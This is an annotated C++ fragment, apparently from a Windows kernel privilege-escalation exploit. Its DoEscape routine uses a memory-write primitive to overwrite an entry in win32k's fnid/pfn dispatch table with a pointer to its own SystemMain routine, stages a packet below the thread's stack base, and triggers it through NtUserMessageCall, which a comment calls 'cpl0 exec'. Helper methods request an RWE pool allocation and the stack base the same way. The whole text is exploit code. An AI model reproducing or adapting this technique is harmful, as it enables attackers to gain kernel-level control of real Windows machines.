	// Pool-allocation request routed through NtUserMessageCall: the window
	// handle goes first, `size` rides in the second argument, the remaining
	// numeric arguments are zero and EX_ALLOCATE_POOL selects the operation.
	// The call's return value is handed back to the caller unchanged; the
	// name suggests an RWE pool allocation, but nothing in this block
	// confirms what the callee does with it.
	__checkReturn
	void*
	ExAllocateRwePool(
		__in size_t size
		)
	{
		const auto hwnd = m_window->Hwnd();
		return NtUserMessageCall(hwnd, size, 0, 0, 0, EX_ALLOCATE_POOL);
	}
	// Escape step, in three ordered moves: (1) write the address of
	// SystemMain, rebased from this module onto `kernelImage`, into one
	// entry of win32k's fnid/pfn table through m_io; (2) copy `packet` to
	// the memory just below the current thread's stack base; (3) issue
	// NtUserMessageCall with the ACE index. The original comment labels
	// step (3) the "cpl0 exec"; presumably it dispatches to the pointer
	// installed in step (1), but that is not verifiable from this block.
	// Both writes must succeed before the trigger, hence the early returns.
	//
	// kernelImage: relocation target passed to RELLOCATE alongside the
	//              module base — presumably the kernel-mode image that
	//              SystemMain is rebased against; confirm with the caller.
	// packet:      declared __inout but only read here (copied by m_io);
	//              any update presumably happens on the far side of the
	//              trigger call — verify.
	// Returns false if the stack base cannot be obtained or either write
	// fails; true once the trigger has been issued (its result is dropped).
	__checkReturn
	bool
	DoEscape(
		__in const void* kernelImage,
		__inout extinterface::PACKET& packet
		)
	{
		// The packet destination below is derived from this address, so a
		// null result makes the rest of the sequence meaningless.
		auto stack_base = GetCurrentThreadStackBase();
		if (!stack_base)
			return false;

		// Table index is UNUSED_IND + ACE - 1; the -1 adjustment is not
		// explained here — confirm against the mpFnidPfn() layout.
		void* ace = RELLOCATE(SystemMain, CDllModule::ModuleBase(), kernelImage);
		if (!m_io.Write(&m_win32k->mpFnidPfn()[UNUSED_IND + ACE - 1], &ace, sizeof(ace)))
			return false;

		// Stage the packet immediately below the stack base (one
		// sizeof(packet) down), where the triggered code is expected to
		// find it.
		if (!m_io.Write(static_cast<char*>(stack_base) - sizeof(packet), &packet, sizeof(packet)))
			return false;

		//cpl0 exec : trigger call; its return value is intentionally
		// discarded (void cast), success is reported once it was issued.
		(void)NtUserMessageCall(m_window->Hwnd(), DEFAULT_PARAM, 0, 0, 0, ACE);
		return true;
	}
	// Asks, via NtUserMessageCall, for the current thread's stack base:
	// PS_GET_CURRENT_THREAD_STACK_BASE selects the query and DEFAULT_PARAM
	// occupies the second argument. The raw return value is passed through
	// as-is; DoEscape treats a null result as failure.
	__checkReturn
	void*
	GetCurrentThreadStackBase()
	{
		const auto hwnd = m_window->Hwnd();
		return NtUserMessageCall(hwnd, DEFAULT_PARAM, 0, 0, 0,
		                         PS_GET_CURRENT_THREAD_STACK_BASE);
	}